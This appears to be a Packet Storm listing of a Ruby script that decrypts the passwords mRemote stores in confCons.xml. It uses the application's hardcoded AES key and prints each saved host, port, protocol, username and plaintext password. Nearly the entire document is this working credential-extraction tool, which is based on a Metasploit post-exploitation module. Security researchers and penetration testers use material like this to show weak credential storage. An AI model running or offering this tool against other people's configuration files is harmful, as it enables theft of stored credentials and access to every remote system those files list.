mRemote Offline Password Decrypt

2014-04-24T00:00:00
ID PACKETSTORM:126309
Type packetstorm
Reporter Adriano Marcio Monteiro
Modified 2014-04-24T00:00:00

Description

                                        
                                            `################################################################################  
# #  
# mRemote Offline Password Decrypt #  
# Based on Metasploit Module enum_mremote_pwds.rb from David Maloney #  
# Autor: Adriano Marcio Monteiro #  
# E-mail: adrianomarciomonteiro@gmail.com #  
# Blog: adrianomarciomonteiro.blogspot.com.br #  
# #  
# Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml #  
# #  
################################################################################  
require 'rexml/document'  
require 'openssl'  
require 'optparse'  
include REXML  
case ARGV[0]  
when "confCons.xml"  
@secret= "\xc8\xa3\x9d\xe2\xa5\x47\x66\xa0\xda\x87\x5f\x79\xaa\xf1\xaa\x8c"  
xmlfile = File.new(ARGV[0])  
xmldoc = Document.new(xmlfile)  
xmldoc.elements.each("Connections/Node"){|e|  
host = e.attributes['Hostname']  
port = e.attributes['Port']  
proto = e.attributes['Protocol']  
user = e.attributes['Username']  
domain = e.attributes['Domain']  
epassword= e.attributes['Password']  
next if epassword == nil or epassword== ""  
decoded = epassword.unpack("m*")[0]  
iv= decoded.slice!(0,16)  
decipher = OpenSSL::Cipher::AES.new(128, :CBC)  
decipher.decrypt  
decipher.key = @secret  
decipher.iv = iv if iv != nil  
pass = decipher.update(decoded) + decipher.final  
print "HOST:#{host} PORT:#{port} PROTO:#{proto} USER:#{user} PASS:#{pass}\n"  
}  
else  
print "mRemote Offline Password Decrypt.\n"  
print "Based on Metasploit Module enum_mremote_pwds.rb by David Maloney\n"  
print "Author: Adriano Marcio Monteiro\n"  
print "E-mail: adrianomarciomonteiro@gmail.com\n"  
print "Blog: adrianomarciomonteiro.blogspot.com.br\n\n"  
print "Usage: ruby mRemoteOffPwdsDecrypt.rb confCons.xml\n\n"  
end  
`